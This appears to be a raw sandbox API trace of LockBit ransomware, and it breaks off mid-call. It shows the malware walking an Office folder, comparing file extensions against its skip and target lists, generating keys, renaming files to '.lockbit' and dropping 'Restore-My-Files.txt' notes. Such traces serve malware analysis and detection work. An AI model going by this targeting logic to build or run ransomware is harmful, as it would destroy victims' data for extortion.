1 [0205.767] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.767] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.767] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.767] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.767] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.767] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10358_.GIF") returned 1 [0205.768] lstrcmpiW (lpString1="ntldr", lpString2="BD10358_.GIF") returned 1 [0205.768] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10358_.GIF") returned 1 [0205.768] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10358_.GIF") returned 1 [0205.768] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10358_.GIF") returned -1 [0205.768] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10358_.GIF") returned 1 [0205.768] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10358_.GIF") returned 1 [0205.768] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.768] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF") returned=".GIF" [0205.768] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.768] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.768] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.769] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.769] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.769] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.769] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.769] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.769] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.769] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.769] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF.lockbit") returned 76 [0205.769] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd10358_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.771] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.771] malloc (_Size=0x40068) returned 0x3df0008 [0205.771] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=932) returned 1 [0205.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.772] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.857] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.857] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.857] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.857] free (_Block=0x1fa2ed8) [0205.857] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD10358_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.857] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.857] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.858] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91d2700, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc8dfee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb91d2700, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14516_.GIF", cAlternateFileName="")) returned 1 [0205.858] lstrcmpiW (lpString1=".", lpString2="BD14516_.GIF") returned -1 [0205.858] lstrcmpiW (lpString1="..", lpString2="BD14516_.GIF") returned -1 [0205.858] PathFindExtensionW (pszPath="BD14516_.GIF") returned=".GIF" [0205.858] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.858] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.858] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.859] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.859] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.859] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.859] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.859] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14516_.GIF") returned 1 [0205.859] lstrcmpiW (lpString1="ntldr", lpString2="BD14516_.GIF") returned 1 [0205.859] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14516_.GIF") returned 1 [0205.860] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14516_.GIF") returned 1 [0205.860] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14516_.GIF") returned -1 [0205.860] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14516_.GIF") returned 1 [0205.860] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14516_.GIF") returned 1 [0205.860] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.860] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF") returned=".GIF" [0205.860] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.860] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.860] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.861] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.861] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.861] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.861] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.861] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.861] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF.lockbit") returned 76 [0205.861] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14516_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.863] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.863] malloc (_Size=0x40068) returned 0x3df0008 [0205.863] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=352) returned 1 [0205.863] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.864] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.865] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.865] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.868] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.868] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.868] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.868] free (_Block=0x1fa2ed8) [0205.868] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14516_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.868] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.868] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.868] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d9c300, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbc906040, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8d9c300, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x617, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14538_.GIF", cAlternateFileName="")) returned 1 [0205.868] lstrcmpiW (lpString1=".", lpString2="BD14538_.GIF") returned -1 [0205.868] lstrcmpiW (lpString1="..", lpString2="BD14538_.GIF") returned -1 [0205.868] PathFindExtensionW (pszPath="BD14538_.GIF") returned=".GIF" [0205.868] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.868] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.868] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.869] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.869] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.870] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14538_.GIF") returned 1 [0205.870] lstrcmpiW (lpString1="ntldr", lpString2="BD14538_.GIF") returned 1 [0205.870] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14538_.GIF") returned 1 [0205.870] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14538_.GIF") returned 1 [0205.870] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14538_.GIF") returned -1 [0205.870] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14538_.GIF") returned 1 [0205.870] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14538_.GIF") returned 1 [0205.870] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.870] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF") returned=".GIF" [0205.870] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.870] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.871] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.871] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.871] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF.lockbit") returned 76 [0205.871] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14538_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.873] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.873] malloc (_Size=0x40068) returned 0x3df0008 [0205.873] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1559) returned 1 [0205.873] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, 